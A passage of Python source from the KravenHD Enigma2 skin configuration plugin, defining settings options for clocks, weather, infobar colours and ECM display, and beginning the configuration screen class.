sec\")),\n\t\t\t\t(\"startdelay=8000\", _(\"8 sec\")),\n\t\t\t\t(\"startdelay=10000\", _(\"10 sec\")),\n\t\t\t\t(\"startdelay=15000\", _(\"15 sec\")),\n\t\t\t\t(\"startdelay=20000\", _(\"20 sec\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.RunningTextSpeed = ConfigSelection(default=\"steptime=100\", choices = [\n\t\t\t\t(\"steptime=200\", _(\"5 px/sec\")),\n\t\t\t\t(\"steptime=100\", _(\"10 px/sec\")),\n\t\t\t\t(\"steptime=66\", _(\"15 px/sec\")),\n\t\t\t\t(\"steptime=50\", _(\"20 px/sec\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.RunningTextSpeed2 = ConfigSelection(default=\"steptime=100\", choices = [\n\t\t\t\t(\"steptime=200\", _(\"5 px/sec\")),\n\t\t\t\t(\"steptime=100\", _(\"10 px/sec\")),\n\t\t\t\t(\"steptime=50\", _(\"20 px/sec\")),\n\t\t\t\t(\"steptime=33\", _(\"30 px/sec\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ScrollBar = ConfigSelection(default=\"on\", choices = [\n\t\t\t\t(\"on\", _(\"on\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IconStyle = ConfigSelection(default=\"icons-light\", choices = [\n\t\t\t\t(\"icons-light\", _(\"light\")),\n\t\t\t\t(\"icons-dark\", _(\"dark\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IconStyle2 = ConfigSelection(default=\"icons-light2\", choices = [\n\t\t\t\t(\"icons-light2\", _(\"light\")),\n\t\t\t\t(\"icons-dark2\", _(\"dark\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ClockStyle = ConfigSelection(default=\"clock-classic\", choices = [\n\t\t\t\t(\"clock-classic\", _(\"standard\")),\n\t\t\t\t(\"clock-classic-big\", _(\"standard big\")),\n\t\t\t\t(\"clock-analog\", _(\"analog\")),\n\t\t\t\t(\"clock-android\", _(\"android\")),\n\t\t\t\t(\"clock-color\", _(\"colored\")),\n\t\t\t\t(\"clock-flip\", _(\"flip\")),\n\t\t\t\t(\"clock-weather\", _(\"weather icon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ClockStyleNoInternet = ConfigSelection(default=\"clock-classic\", choices = [\n\t\t\t\t(\"clock-classic\", _(\"standard\")),\n\t\t\t\t(\"clock-classic-big\", _(\"standard big\")),\n\t\t\t\t(\"clock-analog\", _(\"analog\")),\n\t\t\t\t(\"clock-color\", _(\"colored\")),\n\t\t\t\t(\"clock-flip\", _(\"flip\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherStyle = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"weather-big\", _(\"big\")),\n\t\t\t\t(\"weather-small\", _(\"small\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherStyle2 = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"weather-left\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherStyle3 = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"weather-left\", _(\"on\")),\n\t\t\t\t(\"netatmobar\", _(\"NetatmoBar\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherStyleNoInternet = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ECMVisible = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"ib\", _(\"Infobar\")),\n\t\t\t\t(\"sib\", _(\"SecondInfobar\")),\n\t\t\t\t(\"ib+sib\", _(\"Infobar & SecondInfobar\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ECMLine1 = ConfigSelection(default=\"ShortReader\", choices = [\n\t\t\t\t(\"VeryShortCaid\", _(\"short with CAID\")),\n\t\t\t\t(\"VeryShortReader\", _(\"short with source\")),\n\t\t\t\t(\"ShortReader\", _(\"compact\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ECMLine2 = ConfigSelection(default=\"ShortReader\", choices = [\n\t\t\t\t(\"VeryShortCaid\", _(\"short with 
CAID\")),\n\t\t\t\t(\"VeryShortReader\", _(\"short with source\")),\n\t\t\t\t(\"ShortReader\", _(\"compact\")),\n\t\t\t\t(\"Normal\", _(\"balanced\")),\n\t\t\t\t(\"Long\", _(\"extensive\")),\n\t\t\t\t(\"VeryLong\", _(\"complete\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ECMLine3 = ConfigSelection(default=\"ShortReader\", choices = [\n\t\t\t\t(\"VeryShortCaid\", _(\"short with CAID\")),\n\t\t\t\t(\"VeryShortReader\", _(\"short with source\")),\n\t\t\t\t(\"ShortReader\", _(\"compact\")),\n\t\t\t\t(\"Normal\", _(\"balanced\")),\n\t\t\t\t(\"Long\", _(\"extensive\")),\n\t\t\t\t])\n\nconfig.plugins.KravenHD.FTA = ConfigSelection(default=\"FTAVisible\", choices = [\n\t\t\t\t(\"FTAVisible\", _(\"on\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.SystemInfo = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"systeminfo-small\", _(\"small\")),\n\t\t\t\t(\"systeminfo-big\", _(\"big\")),\n\t\t\t\t(\"systeminfo-bigsat\", _(\"big + Sat\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.SIB = ConfigSelection(default=\"sib4\", choices = [\n\t\t\t\t(\"sib1\", _(\"MiniTV/weather\")),\n\t\t\t\t(\"sib2\", _(\"left/right\")),\n\t\t\t\t(\"sib3\", _(\"single\")),\n\t\t\t\t(\"sib4\", _(\"MiniTV\")),\n\t\t\t\t(\"sib5\", _(\"MiniTV2\")),\n\t\t\t\t(\"sib6\", _(\"Weather\")),\n\t\t\t\t(\"sib7\", _(\"Weather2\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.TunerBusyList = ConfigSelection(default=\"CCCC00\", choices = [\n\t\t\t\t(\"CCCC00\", _(\"yellow\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.TunerBusySelf = ConfigText(default=\"CCCC00\")\nconfig.plugins.KravenHD.TunerBusy = ConfigText(default=\"CCCC00\")\n\nconfig.plugins.KravenHD.TunerLiveList = ConfigSelection(default=\"00B400\", choices = [\n\t\t\t\t(\"00B400\", _(\"green\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.TunerLiveSelf = ConfigText(default=\"00B400\")\nconfig.plugins.KravenHD.TunerLive = ConfigText(default=\"00B400\")\n\nconfig.plugins.KravenHD.TunerRecordList = ConfigSelection(default=\"FF0C00\", choices = [\n\t\t\t\t(\"FF0C00\", _(\"red\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.TunerRecordSelf = ConfigText(default=\"FF0C00\")\nconfig.plugins.KravenHD.TunerRecord = ConfigText(default=\"FF0C00\")\n\nconfig.plugins.KravenHD.TunerXtremeBusyList = ConfigSelection(default=\"1BA1E2\", choices = [\n\t\t\t\t(\"1BA1E2\", _(\"cyan\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.TunerXtremeBusySelf = ConfigText(default=\"1BA1E2\")\nconfig.plugins.KravenHD.TunerXtremeBusy = ConfigText(default=\"1BA1E2\")\n\nconfig.plugins.KravenHD.ShowUnusedTuner = ConfigSelection(default=\"on\", choices = [\n\t\t\t\t(\"on\", _(\"on\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ShowAgcSnr = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"on\", _(\"on\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\t\t\t\t\nconfig.plugins.KravenHD.Infobox = ConfigSelection(default=\"sat\", choices = [\n\t\t\t\t(\"sat\", _(\"Tuner/Satellite + SNR\")),\n\t\t\t\t(\"tunerinfo\", _(\"Tunerinfo\")),\n\t\t\t\t(\"cpu\", _(\"CPU + Load\")),\n\t\t\t\t(\"temp\", _(\"Temperature + Fan\"))\n\t\t\t\t])\n\t\t\t\t\nconfig.plugins.KravenHD.Infobox2 = ConfigSelection(default=\"tunerinfo\", choices = [\n\t\t\t\t(\"tunerinfo\", _(\"Tunerinfo\")),\n\t\t\t\t(\"cpu\", _(\"CPU + Load\")),\n\t\t\t\t(\"temp\", _(\"Temperature + Fan\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IBColor = 
ConfigSelection(default=\"all-screens\", choices = [\n\t\t\t\t(\"all-screens\", _(\"in all Screens\")),\n\t\t\t\t(\"only-infobar\", _(\"only Infobar, SecondInfobar & Players\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.About = ConfigSelection(default=\"about\", choices = [\n\t\t\t\t(\"about\", _(\"KravenHD\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.Logo = ConfigSelection(default=\"minitv\", choices = [\n\t\t\t\t(\"logo\", _(\"Logo\")),\n\t\t\t\t(\"minitv\", _(\"MiniTV\")),\n\t\t\t\t(\"metrix-icons\", _(\"Icons\")),\n\t\t\t\t(\"minitv-metrix-icons\", _(\"MiniTV + Icons\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.LogoNoInternet = ConfigSelection(default=\"minitv\", choices = [\n\t\t\t\t(\"logo\", _(\"Logo\")),\n\t\t\t\t(\"minitv\", _(\"MiniTV\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.MainmenuFontsize = ConfigSelection(default=\"mainmenu-big\", choices = [\n\t\t\t\t(\"mainmenu-small\", _(\"small\")),\n\t\t\t\t(\"mainmenu-middle\", _(\"middle\")),\n\t\t\t\t(\"mainmenu-big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.MainmenuHorTitleFontList = ConfigSelection(default=\"F0A30A\", choices = ColorSelfList)\nconfig.plugins.KravenHD.MainmenuHorTitleFontSelf = ConfigText(default=\"F0A30A\")\nconfig.plugins.KravenHD.MainmenuHorTitleFont = ConfigText(default=\"F0A30A\")\n\nconfig.plugins.KravenHD.MainmenuHorIconColorList = ConfigSelection(default=\"3F3F3F\", choices = ColorSelfList)\nconfig.plugins.KravenHD.MainmenuHorIconColorSelf = ConfigText(default=\"3F3F3F\")\nconfig.plugins.KravenHD.MainmenuHorIconColor = ConfigText(default=\"3F3F3F\")\n\nconfig.plugins.KravenHD.MenuIcons = ConfigSelection(default=\"stony272\", choices = [\n\t\t\t\t(\"stony272\", _(\"stony272\")),\n\t\t\t\t(\"stony272-metal\", _(\"stony272-metal\")),\n\t\t\t\t(\"stony272-gold-round\", _(\"stony272-gold-round\")),\n\t\t\t\t(\"stony272-gold-square\", _(\"stony272-gold-square\")),\n\t\t\t\t(\"rennmaus-kleinerteufel\", _(\"rennmaus-kleiner.teufel\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.DebugNames = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"screennames-on\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherView = ConfigSelection(default=\"meteo\", choices = [\n\t\t\t\t(\"icon\", _(\"Icon\")),\n\t\t\t\t(\"meteo\", _(\"Meteo\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.MeteoColor = ConfigSelection(default=\"meteo-light\", choices = [\n\t\t\t\t(\"meteo-light\", _(\"light\")),\n\t\t\t\t(\"meteo-dark\", _(\"dark\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.Primetimeavailable = ConfigSelection(default=\"primetime-on\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"primetime-on\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.EMCSelectionColors = ConfigSelection(default=\"global\", choices = [\n\t\t\t\t(\"global\", _(\"global colors\")),\n\t\t\t\t(\"custom\", _(\"define new colors\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.EMCSelectionBackgroundList = ConfigSelection(default=\"213305\", choices = ColorSelfList)\nconfig.plugins.KravenHD.EMCSelectionBackgroundSelf = ConfigText(default=\"213305\")\nconfig.plugins.KravenHD.EMCSelectionBackground = ConfigText(default=\"213305\")\n\nconfig.plugins.KravenHD.EMCSelectionFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.EMCSelectionFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.EMCSelectionFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.SerienRecorder = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", 
_(\"off\")),\n\t\t\t\t(\"serienrecorder\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.MediaPortal = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"mediaportal\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.PVRState = ConfigSelection(default=\"pvrstate-center-big\", choices = [\n\t\t\t\t(\"pvrstate-center-big\", _(\"center big\")),\n\t\t\t\t(\"pvrstate-center-small\", _(\"center small\")),\n\t\t\t\t(\"pvrstate-left-small\", _(\"left small\")),\n\t\t\t\t(\"pvrstate-off\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.PigStyle = ConfigText(default=\"\")\nconfig.plugins.KravenHD.PigMenuActive = ConfigYesNo(default=False)\n\nconfig.plugins.KravenHD.FileCommander = ConfigSelection(default=\"filecommander-hor\", choices = [\n\t\t\t\t(\"filecommander-hor\", _(\"horizontal\")),\n\t\t\t\t(\"filecommander-ver\", _(\"vertical\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.msn_language = ConfigSelection(default=\"de-DE\", choices = [\n\t\t\t\t(\"de-DE\", _(\"Deutsch\")),\n\t\t\t\t(\"en-US\", _(\"English\")),\n\t\t\t\t(\"ru-RU\", _(\"Russian\")),\n\t\t\t\t(\"it-IT\", _(\"Italian\")),\n\t\t\t\t(\"es-ES\", _(\"Spanish\")),\n\t\t\t\t(\"uk-UA\", _(\"Ukrainian\")),\n\t\t\t\t(\"pt-PT\", _(\"Portuguese\")),\n\t\t\t\t(\"ro-RO\", _(\"Romanian\")),\n\t\t\t\t(\"pl-PL\", _(\"Polish\")),\n\t\t\t\t(\"fi-FI\", _(\"Finnish\")),\n\t\t\t\t(\"nl-NL\", _(\"Dutch\")),\n\t\t\t\t(\"fr-FR\", _(\"French\")),\n\t\t\t\t(\"bg-BG\", _(\"Bulgarian\")),\n\t\t\t\t(\"sv-SE\", _(\"Swedish\")),\n\t\t\t\t(\"tr-TR\", _(\"Turkish\")),\n\t\t\t\t(\"hr-HR\", _(\"Croatian\")),\n\t\t\t\t(\"ca-AD\", _(\"Catalan\")),\n\t\t\t\t(\"sk-SK\", _(\"Slovak\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.msn_searchby = ConfigSelection(default=\"auto-ip\", choices = [\n\t\t\t\t(\"auto-ip\", _(\"IP\")),\n\t\t\t\t(\"location\", _(\"Enter location manually\"))\n\t\t\t\t])\n\nSearchResultList = []\nconfig.plugins.KravenHD.msn_list = ConfigSelection(default = \"\", choices = SearchResultList)\n\nconfig.plugins.KravenHD.msn_cityfound = ConfigText(default = \"\")\nconfig.plugins.KravenHD.msn_cityname = ConfigText(default = \"\")\nconfig.plugins.KravenHD.msn_code = ConfigText(default = \"\")\n\nconfig.plugins.KravenHD.PlayerClock = ConfigSelection(default=\"player-classic\", choices = [\n\t\t\t\t(\"player-classic\", _(\"standard\")),\n\t\t\t\t(\"player-android\", _(\"android\")),\n\t\t\t\t(\"player-flip\", _(\"flip\")),\n\t\t\t\t(\"player-weather\", _(\"weather icon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.Android2List = ConfigSelection(default=\"000000\", choices = ColorSelfList)\nconfig.plugins.KravenHD.Android2Self = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.Android2 = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.CategoryProfiles = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategorySystem = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryGlobalColors = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryInfobarLook = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryInfobarContents = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryWeather = ConfigSelection(default=\"category\", 
choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryClock = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryECMInfos = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryViews = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryChannellist = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryNumberZap = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryGraphicalEPG = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryEMC = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryPlayers = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryAntialiasing = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryVarious = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.UnwatchedColorList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.UnwatchedColorSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.UnwatchedColor = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.WatchingColorList = ConfigSelection(default=\"0050EF\", choices = ColorSelfList)\nconfig.plugins.KravenHD.WatchingColorSelf = ConfigText(default=\"0050EF\")\nconfig.plugins.KravenHD.WatchingColor = ConfigText(default=\"0050EF\")\n\nconfig.plugins.KravenHD.FinishedColorList = ConfigSelection(default=\"70AD11\", choices = ColorSelfList)\nconfig.plugins.KravenHD.FinishedColorSelf = ConfigText(default=\"70AD11\")\nconfig.plugins.KravenHD.FinishedColor = ConfigText(default=\"70AD11\")\n\nconfig.plugins.KravenHD.PermanentClock = ConfigSelection(default=\"permanentclock-infobar-big\", choices = [\n\t\t\t\t(\"permanentclock-infobar-big\", _(\"infobar colors big\")),\n\t\t\t\t(\"permanentclock-infobar-small\", _(\"infobar colors small\")),\n\t\t\t\t(\"permanentclock-global-big\", _(\"global colors big\")),\n\t\t\t\t(\"permanentclock-global-small\", _(\"global colors small\")),\n\t\t\t\t(\"permanentclock-transparent-big\", _(\"transparent big\")),\n\t\t\t\t(\"permanentclock-transparent-small\", _(\"transparent small\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.KravenIconVPosition = ConfigSelection(default=\"vposition-2\", choices = [\n\t\t\t\t(\"vposition-3\", _(\"-3\")),\n\t\t\t\t(\"vposition-2\", _(\"-2\")),\n\t\t\t\t(\"vposition-1\", _(\"-1\")),\n\t\t\t\t(\"vposition0\", _(\"0\")),\n\t\t\t\t(\"vposition+1\", _(\"+1\")),\n\t\t\t\t(\"vposition+2\", _(\"+2\")),\n\t\t\t\t(\"vposition+3\", _(\"+3\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.SkinResolution = ConfigSelection(default=\"hd\", choices = [\n\t\t\t\t(\"hd\", _(\"HD\")),\n\t\t\t\t(\"fhd\", _(\"FHD\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.PopupStyle = ConfigSelection(default=\"popup-grad-trans\", choices = [\n\t\t\t\t(\"popup-grad-trans\", _(\"gradient transparent\")),\n\t\t\t\t(\"popup-grad\", 
_(\"gradient\")),\n\t\t\t\t(\"popup-box-trans\", _(\"box transparent\")),\n\t\t\t\t(\"popup-box\", _(\"box\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IBProgressList = ConfigSelection(default=\"ffffff\", choices = ProgressList)\nconfig.plugins.KravenHD.IBProgressSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.IBProgress = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.IBProgressBackgroundList = ConfigSelection(default=\"1BA1E2\", choices = BorderSelfList)\nconfig.plugins.KravenHD.IBProgressBackgroundSelf = ConfigText(default=\"1BA1E2\")\nconfig.plugins.KravenHD.IBProgressBackground = ConfigText(default=\"1BA1E2\")\n\nconfig.plugins.KravenHD.IBProgressBorderLine = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"ib-progress-border\", _(\"border\")),\n\t\t\t\t(\"ib-progress-line\", _(\"line\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IBProgressBorderLineColorList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.IBProgressBorderLineColorSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.IBProgressBorderLineColor = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.InfobarSelfColorR = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.InfobarSelfColorG = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.InfobarSelfColorB = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.BackgroundSelfColorR = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.BackgroundSelfColorG = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.BackgroundSelfColorB = ConfigSlider(default=75, increment=5, limits=(0, 255))\n\nclass KravenHD(ConfigListScreen, Screen):\n\n\tif DESKTOP_WIDTH <= 1280:\n\t skin = \"\"\"\n\n \n \n Default\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\"\n\telse:\n\t skin = \"\"\"\n\n \n \n Default\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\"\n\n\tdef __init__(self, session, args = None, picPath = None):\n\t\tself.skin_lines = []\n\t\tScreen.__init__(self, session)\n\t\tself.session = session\n\t\tself.datei = \"/usr/share/enigma2/KravenHD/skin.xml\"\n\t\tself.dateiTMP = self.datei + \".tmp\"\n\t\tself.picPath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\"\n\t\tself.profiles = \"/etc/enigma2/\"\n\t\tself.Scale = AVSwitch().getFramebufferScale()\n\t\tself.PicLoad = ePicLoad()\n\t\tself[\"helperimage\"] = Pixmap()\n\t\tself[\"Canvas\"] = CanvasSource()\n\t\tself[\"help\"] = StaticText()\n\t\tself[\"version\"] = StaticText()\n\n\t\tlist = []\n\t\tConfigListScreen.__init__(self, list)\n\n\t\tself[\"actions\"] = ActionMap([\"KravenHDConfigActions\", \"OkCancelActions\", \"DirectionActions\", \"ColorActions\", \"InputActions\"],\n\t\t{\n\t\t\t\"upUp\": self.keyUpLong,\n\t\t\t\"downUp\": self.keyDownLong,\n\t\t\t\"up\": self.keyUp,\n\t\t\t\"down\": self.keyDown,\n\t\t\t\"left\": self.keyLeft,\n\t\t\t\"right\": self.keyRight,\n\t\t\t\"red\": self.redbutton,\n\t\t\t\"green\": self.save,\n\t\t\t\"yellow\": self.categoryDown,\n\t\t\t\"blue\": self.categoryUp,\n\t\t\t\"cancel\": self.exit,\n\t\t\t\"pageup\": self.pageUp,\n\t\t\t\"papedown\": self.pageDown,\n\t\t\t\"ok\": self.OK\n\t\t}, -1)\n\n\t\tself[\"key_red\"] = StaticText()\n\t\tself[\"key_green\"] = StaticText(_(\"Save skin\"))\n\t\tself[\"key_yellow\"] = StaticText()\n\t\tself[\"key_blue\"] = StaticText()\n\t\tself[\"Title\"] 
= StaticText(_(\"Configuration tool for KravenHD\"))\n\n\t\tself.UpdatePicture()\n\n\t\tself.timer = eTimer()\n\t\tself.timer.callback.append(self.updateMylist)\n\t\tself.onLayoutFinish.append(self.updateMylist)\n\n\t\tself.lastProfile=\"0\"\n\n\t\tself.actClockstyle=\"\"\n\t\tself.actWeatherstyle=\"\"\n\t\tself.actChannelselectionstyle=\"\"\n\t\tself.actMenustyle=\"\"\n\t\tself.actCity=\"\"\n\t\tself.actCSItemHeight=\"\"\n\n\t\tself.skincolorinfobarcolor=\"\"\n\t\tself.skincolorbackgroundcolor=\"\"\n\n\t\tself.actListColorSelection=None\n\t\tself.actSelfColorSelection=None\n\n\t\tself.BoxName=self.getBoxName()\n\t\tself.Tuners=self.getTuners()\n\t\tself.InternetAvailable=self.getInternetAvailable()\n\t\tself.UserMenuIconsAvailable=self.getUserMenuIconsAvailable()\n\n\tdef mylist(self):\n\t\tself.timer.start(100, True)\n\n\tdef updateMylist(self):\n\n\t\tif config.plugins.KravenHD.customProfile.value!=self.lastProfile:\n\t\t\tself.loadProfile()\n\t\t\tself.lastProfile=config.plugins.KravenHD.customProfile.value\n\n\t\tlist = []\n\n\t\t# page 1\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"About\"), config.plugins.KravenHD.About, _(\"The KravenHD skin will be generated by this plugin according to your preferences. Make your settings and watch the changes in the preview window above. When finished, save your skin by pressing the green button and restart the GUI.\")))\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 1 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"PROFILES ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryProfiles, _(\"This sections offers all profile settings. Different settings can be saved, modified, shared and cloned. Read the FAQs.\")))\n\t\tlist.append(getConfigListEntry(_(\"Active Profile / Save\"), config.plugins.KravenHD.customProfile, _(\"Select the profile you want to work with. Profiles are saved automatically on switching them or by pressing the OK button. New profiles will be generated based on the actual one. Profiles are interchangeable between boxes.\")))\n\t\tlist.append(getConfigListEntry(_(\"Default Profile / Reset\"), config.plugins.KravenHD.defaultProfile, _(\"Select the default profile you want to use when resetting the active profile (OK button). You can add your own default profiles under /etc/enigma2/kravenhd_default_n (n<=20).\")))\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 1 (category 3)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"SYSTEM ________________________________________________________________________________\"), config.plugins.KravenHD.CategorySystem, _(\"This sections offers all basic settings.\")))\n\t\tlist.append(getConfigListEntry(_(\"Skin Resolution\"), config.plugins.KravenHD.SkinResolution, _(\"Choose the resolution of the skin.\")))\n\t\tlist.append(getConfigListEntry(_(\"Icons (except Infobar)\"), config.plugins.KravenHD.IconStyle2, _(\"Choose between light and dark icons in system screens. 
\t\tlist.append(getConfigListEntry(_(\"Icons (except Infobar)\"), config.plugins.KravenHD.IconStyle2, _(\"Choose between light and dark icons in system screens. The icons in the infobars are not affected.\")))\n\t\tlist.append(getConfigListEntry(_(\"Running Text (Delay)\"), config.plugins.KravenHD.RunningText, _(\"Choose the start delay for running text.\")))\n\t\tif not config.plugins.KravenHD.RunningText.value == \"none\":\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Running Text (Speed)\"), config.plugins.KravenHD.RunningTextSpeed, _(\"Choose the speed for running text.\")))\n\t\t\telse:\n\t\t\t\tlist.append(getConfigListEntry(_(\"Running Text (Speed)\"), config.plugins.KravenHD.RunningTextSpeed2, _(\"Choose the speed for running text.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"Scrollbars\"), config.plugins.KravenHD.ScrollBar, _(\"Choose whether scrollbars should be shown.\")))\n\t\tlist.append(getConfigListEntry(_(\"Show Infobar-Background\"), config.plugins.KravenHD.IBColor, _(\"Choose whether you want to see the infobar background in all screens (bicolored background).\")))\n\t\tif self.InternetAvailable or 